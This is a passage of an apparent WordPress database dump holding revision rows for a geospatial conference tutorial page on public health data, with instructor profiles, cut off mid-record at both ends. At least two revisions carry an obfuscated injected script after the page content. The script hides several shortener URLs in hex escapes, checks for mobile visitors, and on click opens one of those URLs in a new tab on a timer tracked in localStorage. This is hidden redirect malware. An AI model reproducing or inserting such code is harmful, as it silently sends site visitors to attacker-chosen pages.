_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-07 00:52:00','2023-02-07 00:52:00','',3681,'https://gsw2023.com/?p=3881',0,'revision','',0),
(3882,1,'2023-02-07 00:52:34','2023-02-07 00:52:34','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<p>DR.<a href=\"https://gsw2023.com/index.php/dt_team/sameer-saran/\"><strong>Sameer Saran</strong></a></p>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p><strong>ISPRS Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p>Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-07 00:52:34','2023-02-07 00:52:34','',3681,'https://gsw2023.com/?p=3882',0,'revision','',0),
(3884,1,'2023-02-07 01:08:23','2023-02-07 01:08:23','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3699\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut4.jpg\" alt=\"\" width=\"74\" height=\"82\" /></p>\n<p>Dr. Priyanka Singh</p>\n<p>School of Computer Sciences, University of Petroleum &amp; Energy Studies, Dehradun, INDIA</p>\n<p><strong>ISPRS Secretary, WG IV/10</strong> Dr. Priyanka Singh is a Faculty of Computer Science in University of Petroleum and Energy Studies, India. She received her PhD in Data Science from IIT(ISM) and IIRS (ISRO), India in 2019. She received international and national awards in field of spatial sciences. Her research interests are Applied machine learning, WebGIS, citizen science, predictive analytics, geo-health and spatial modelling and analytics.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" 